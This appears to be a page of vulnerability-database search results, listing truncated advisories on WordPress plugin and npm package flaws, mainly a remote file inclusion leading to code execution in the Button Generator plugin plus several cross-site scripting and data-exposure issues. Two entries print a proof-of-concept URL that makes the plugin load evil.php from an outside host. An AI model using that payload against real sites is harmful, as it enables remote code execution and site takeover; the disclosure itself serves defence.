CVE-2021-25052

The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE...

CVE-2021-25052

CVE-2021-25052 affects the WordPress Button Generator plugin (pre-2.3.3) in the wow-company admin menu. A flaw in how include() handles PHP files (and data:///http:// resources) enables remote file inclusion, which can lead to CSRF and remote code execution. Remediation: upgrade to version 2.3.3 ...

Cluevo < 1.8.1 - Admin+ Stored Cross Site Scripting

The plugin does not sanitise and escape Course's module, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed On the Learning Management page /wp-admin/admin.php?page=cluevo-lms, click Add Course, then put the followi...

WordPress plugin Button Generator 跨站请求伪造漏洞

WordPress is the Wordpress Foundation's set of blogging platforms developed using the PHP language. The WordPress Button Generator Plugin has a file inclusion vulnerability prior to 2.3.3. The vulnerability stems from the fact that the plugin does not effectively filter calls to remote file...

Dashboard is not working , lend positiona are still loading, the same is for Lend button, Lend Amount to lend is not refresjing

Handle 0v3rf10w Vulnerability details Impact Detailed description of the impact of this finding. Proof of Concept Provide direct links to all referenced code in GitHub. Add screenshots, logs, or any other relevant proof that illustrates the concept. Tools Used Recommended Mitigation Steps --- The...

Code Injection in microweber/microweber

Description HTML Injection is a vulnerability in which the attacker can inject malicious html content in the webpage. Proof of Concept 1 Admin has enabled Comments module, so that people can comment on a blog post. 2 Attacker post the following comment: SOMETHING+SOMETHING Now, observe the change...

WordPress Buttonizer-Smart Floating Action Button plugin cross-site scripting vulnerability

WordPress is a set of blogging platforms developed by the Wordpress Foundation using the PHP language. The platform supports setting up personal blog sites on PHP and MySQL servers. buttonizer-Smart Floating Action Button plugin has a cross-site scripting vulnerability in versions prior to 2.5.5,...

WordPress Plugin Information Disclosure Vulnerability (CNVD-2021-102800)

WordPress is the Wordpress Foundation's set of blogging platform developed using the PHP language . The platform supports PHP and MySQL servers to set up a personal blog site.WordPress Plugin is a WordPress open source application plugin . WordPress Plugins Like Button Rating LikeBtn An informati...

Cross site request forgery (csrf)

The Like Button Rating ♥ LikeBtn WordPress plugin before 2.6.38 does not have any authorisation and CSRF checks in the likebtnexportvotes AJAX action, which could allow any authenticated user, such as subscriber, to get a list of email and IP addresses of people who liked content from the blog...

CVE-2021-24945 Like Button Rating < 2.6.38 - Unauthorised Vote Export to Email & IP Addresses Disclosure

The Like Button Rating ♥ LikeBtn WordPress plugin before 2.6.38 does not have any authorisation and CSRF checks in the likebtnexportvotes AJAX action, which could allow any authenticated user, such as subscriber, to get a list of email and IP addresses of people who liked content from the blog...

CVE-2021-24945

The WordPress Like Button Rating LikeBtn plugin (versions before 2.6.38) has an authorization/CSRF weakness in the likebtn_export_votes AJAX action. This flaw allows any authenticated user (e.g., a subscriber) to retrieve a list of emails and IP addresses of users who liked content. Root cause: l...

WordPress Plugins Like Button Rating LikeBtn 跨站请求伪造漏洞

WordPress is the Wordpress Foundation's set of blogging platform developed using the PHP language . The platform supports PHP and MySQL servers to set up a personal blog site.WordPress Plugin is a WordPress open source application plugin . WordPress Plugins Like Button Rating LikeBtn An informati...

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. PoC http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

Button Generator < 2.3.3 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

WordPress Button Generator – easily Button Builder plugin <= 2.3.2 - Remote File Inclusion (RFI) leading to Remote Code Execution (RCE) via CSRF vulnerability

Remote File Inclusion RFI leading to Remote Code Execution RCE via CSRF vulnerability discovered by Krzysztof Zając in WordPress Button Generator – easily Button Builder plugin versions = 2.3.2. Solution Update the WordPress Button Generator – easily Button Builder plugin to the latest available...

react-chat-widget-all-dream (>=2.1.6 <=2.3.1) potentially affected by CVE-2021-43785 via @joeattardi/emoji-button (=2.12.1)

@joeattardi/emoji-button NPM version =2.12.1 is affected by a known vulnerability. The following packages have a transitive dependency on @joeattardi/emoji-button and may be impacted: - react-chat-widget-all-dream =2.1.6, =2.3.1 Source cves: CVE-2021-43785 Source advisory: OSV:GHSA-F34M-X9PJ-62VQ...

Cross-site Scripting (XSS)

@joeattardi/emoji-button is vulnerable to cross-site scripting. The vulnerability exists because the custom emojis of emoji-button doesn't escape HTML, allowing an attacker to inject and execute malicious javascript...

CVE-2021-24883

The Popup Anything WordPress plugin before 2.0.4 does not escape the Link Text and Button Text fields of Popup, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks...

Buttonizer - Smart Floating Action Button < 2.5.5 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some parameter before outputting them in attributes and page, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. PoC Add/edit a new button, set its Button action to "Website...

CVE-2021-43785 Cross Site Scripting Vulnerability in @joeattardi/emoji-button

@joeattardi/emoji-button is a Vanilla JavaScript emoji picker component. In affected versions there are two vectors for XSS attacks: a URL for a custom emoji, and an i18n string. In both of these cases, a value can be crafted such that it can insert a script tag into the page and execute maliciou...